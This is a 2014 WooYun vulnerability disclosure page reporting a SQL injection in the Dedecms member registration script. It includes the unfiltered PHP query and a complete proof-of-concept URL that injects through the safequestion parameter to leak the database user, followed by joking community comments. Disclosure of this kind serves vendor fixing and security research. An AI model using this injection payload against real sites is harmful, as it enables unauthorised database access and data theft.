当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048925

漏洞标题:Dedecms 会员中心注入漏洞11

相关厂商:Dedecms

漏洞作者: Matt

提交时间:2014-01-14 20:20

修复时间:2014-04-14 20:21

公开时间:2014-04-14 20:21

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-14: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向第三方安全合作伙伴开放
2014-03-10: 细节向核心白帽子及相关领域专家公开
2014-03-20: 细节向普通白帽子公开
2014-03-30: 细节向实习白帽子公开
2014-04-14: 细节向公众公开

简要描述:

Dedecms 会员中心注入漏洞11
我没刷洞我没刷洞

详细说明:

/member/reg_new.php
  $dfscores = 0;
        $dfmoney = 0;
        $dfrank = $dsql->GetOne("SELECT money,scores FROM `#@__arcrank` WHERE rank='10' ");
        if(is_array($dfrank))
        {
            $dfmoney = $dfrank['money'];
            $dfscores = $dfrank['scores'];
        }
        $jointime = time();
        $logintime = time();
        $joinip = GetIP();
        $loginip = GetIP();
        $pwd = md5($userpwd);
        
        $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
        
        $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
        `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
       VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
       '0','$spaceSta','','$c','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";//safequestion没有过滤
	   echo  $inQuery ;

漏洞证明:

测试方法 打开
127.0.0.1/dede/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=
吧SLUM改成你的验证码就哦了

1.png

2.png

3.png

修复方案:

过滤!

版权声明:转载请注明来源 Matt@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-01-14 22:23

厂商回复:

已修复,感谢反馈

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-14 20:23 | 404 ( 路人 | Rank:20 漏洞数:4 )

    2k*11=2w2k

  2. 2014-01-14 20:27 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    看到我都麻木鸟。

  3. 2014-01-14 20:27 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    这不是刷rank的节奏了,是刷屏的节奏了

  4. 2014-01-14 20:38 | Excalibur ( 路人 | Rank:0 漏洞数:1 | Ripley Scrowle I shall you tell with pla...)

    操。。。。这要逆天了~~洞主无敌了~

  5. 2014-01-14 20:39 | MT哥 ( 实习白帽子 | Rank:44 漏洞数:28 | 苦逼的学生党,穷屌丝、小菜一枚-AG安全...)

    来个连载100集

  6. 2014-01-14 20:50 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    这样发下去房子能买一栋了

  7. 2014-01-14 20:50 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

    快收了神通吧~

  8. 2014-01-14 21:01 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    洞主发飙了

  9. 2014-01-14 21:04 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    逆天了。。。

  10. 2014-01-14 21:19 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    我已经告诉你爸妈了,你爸妈叫你低调点,虽然你爸妈也是圈子内知名的人物,他们二老说了,你还连载,以后就不给你0day

  11. 2014-01-14 21:49 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

    要有房子了。。

  12. 2014-01-14 21:49 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    该完了吧 得低调点啊.. 我关注你了

  13. 2014-01-14 23:15 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    我靠! 这么吊!

  14. 2014-01-15 19:21 | 残废 ( 普通白帽子 | Rank:179 漏洞数:40 | 我是残废,啦啦啦啦)

    matt牛 你为何这么吊~~~

  15. 2014-01-15 20:47 | discovery ( 路人 | Rank:9 漏洞数:3 | www.google.com)

    matt你这么吊 你家人知道吗?

  16. 2014-01-19 13:21 | 扬沙 ( 路人 | Rank:2 漏洞数:1 | 我很菜,但是我愿意去学习!)

    感谢大家收看今天的节目 我们下期再见!